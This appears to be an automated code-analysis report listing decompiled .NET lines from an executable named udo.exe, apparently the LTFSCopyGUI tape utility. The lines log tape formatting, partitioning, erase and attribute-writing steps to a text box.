                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "Partitioning.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "Unthreading.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "Threading.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "Reinitializing.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "Unloading.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "Unthreading.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "Threading.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(CS_0024_003C_003E8__locals2._0024VB_0024NonLocal__0024VB_0024Closure_2._0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { Operators.ConcatenateObject(Operators.ConcatenateObject((object)("Erasing " + Conversions.ToString(CS_0024_003C_003E8__locals2._0024VB_0024Local_i) + "/"), NewLateBinding.LateGet(CS_0024_003C_003E8__locals2._0024VB_0024NonLocal__0024VB_0024Closure_2._0024VB_0024Me.NumericUpDown6, (Type)null, "Value", new object[0], (string[])null, (Type[])null, (bool[])null)), (object)"..") }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(CS_0024_003C_003E8__locals1._0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { CS_0024_003C_003E8__locals1._0024VB_0024Local_ex.ToString() }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "Erase finished." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateSetComplex(Panel1, (Type)null, "Enabled", new object[1] { true }, (string[])null, (Type[])null, false, true);Nj(Conversions.ToBoolean(NewLateBinding.LateGet(CheckBox3, (Type)null, "Checked", new object[0], (string[])null, (Type[])null, (bool[])null)));}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{if (Operators.CompareString(text2, "", false) == 0){text2 = ConfTapeDrive + " Barcode = " + text;}text2 += "\r\n";object[] array3;bool[] array4;NewLateBinding.LateCall(TextBox2, (Type)null, "AppendText", array3 = new object[1] { text2 }, (string[])null, (Type[])null, array4 = new bool[1] { true }, true);if (array4[0]){text2 = (string)Conversions.ChangeType(RuntimeHelpers.GetObjectValue(array3[0]), typeof(string));}}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateSetComplex(Panel1, (Type)null, "Enabled", new object[1] { true }, (string[])null, (Type[])null, false, true);Nj(Conversions.ToBoolean(NewLateBinding.LateGet(CheckBox3, (Type)null, "Checked", new object[0], (string[])null, (Type[])null, (bool[])null)));}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1]{new n8(c5S3Pa.p6G0Wk)}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1]{new n8(i6Y3Mb.r9LWg6)}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateSet(ButtonDebugDumpMAM, (Type)null, "Enabled", new object[1] { true }, (string[])null, (Type[])null);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(CS_0024_003C_003E8__locals0._0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1]{new n8(qb.s6T)}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(CS_0024_003C_003E8__locals0._0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{//IL_002e: Unknown result type (might be due to invalid IL or missing references)//IL_0034: Expected O, but got Unknown//IL_008c: Unknown result type (might be due to invalid IL or missing references)//IL_0093: Expected O, but got Unknown//IL_00f0: Unknown result type (might be due to invalid IL or missing references)//IL_00f7: Expected O, but got Unknown//IL_0157: Unknown result type (might be due to invalid IL or missing references)//IL_015e: Expected O, but got Unknownforeach (Control item5 in (IEnumerable)NewLateBinding.LateGet(CS_0024_003C_003E8__locals0._0024VB_0024Me.Panel1, (Type)null, "Controls", new object[0], (string[])null, (Type[])null, (bool[])null)){Control val5 = item5;val5.Enabled = true;}foreach (Control item6 in (IEnumerable)NewLateBinding.LateGet(CS_0024_003C_003E8__locals0._0024VB_0024Me.Panel2, (Type)null, "Controls", new object[0], (string[])null, (Type[])null, (bool[])null)){Control val6 = item6;val6.Enabled = true;}foreach (Control item7 in (IEnumerable)NewLateBinding.LateGet(CS_0024_003C_003E8__locals0._0024VB_0024Me.TabControl1, (Type)null, "Controls", new object[0], (string[])null, (Type[])null, (bool[])null)){Control val7 = item7;val7.Enabled = true;}foreach (Control item8 in (IEnumerable)NewLateBinding.LateGet(CS_0024_003C_003E8__locals0._0024VB_0024Me.TabPage1, (Type)null, "Controls", new object[0], (string[])null, (Type[])null, (bool[])null)){Control val8 = item8;val8.Enabled = true;}}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(NewLateBinding.LateGet(ComboBox3, (Type)null, "ComboBox2", new object[0], (string[])null, (Type[])null, (bool[])null), (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateSetComplex(NewLateBinding.LateGet(ComboBox3, (Type)null, "TextBox1", new object[0], (string[])null, (Type[])null, (bool[])null), (Type)null, "Text", new object[1] { text }, (string[])null, (Type[])null, false, true);NewLateBinding.LateCall(ComboBox3, (Type)null, "LoadSchemaFile", new object[0], (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateSet(TextBox8, (Type)null, "Text", new object[1] { "Start format ...\r\n" }, (string[])null, (Type[])null);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "Loading.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "Initializing tape.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "MODE SENSE" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { string.Format(" Mode Data: {0}{1}", k2(array3), "\r\n") }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "MODE SELECT - Partition mode page.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "Partitioning.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "WRITE ATTRIBUTE: Vendor=OPEN.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "WRITE ATTRIBUTE: Application name = LTFSCopyGUI.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { $"WRITE ATTRIBUTE: Application Version={((ApplicationBase)p4.Application).Info.Version.ToString(3)}.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "WRITE ATTRIBUTE: TextLabel= .." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "WRITE ATTRIBUTE: Localization Identifier = 0.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { $"WRITE ATTRIBUTE: Barcode={text}.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "WRITE ATTRIBUTE: Format Version=2.4.0.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "MODE SELECT - Block size.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "Locate to data partition.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "Write VOL1Label.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "Write FileMark.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "Write ltfslabel.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "Write FileMark.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "Write ltfsindex.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "Write FileMark.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
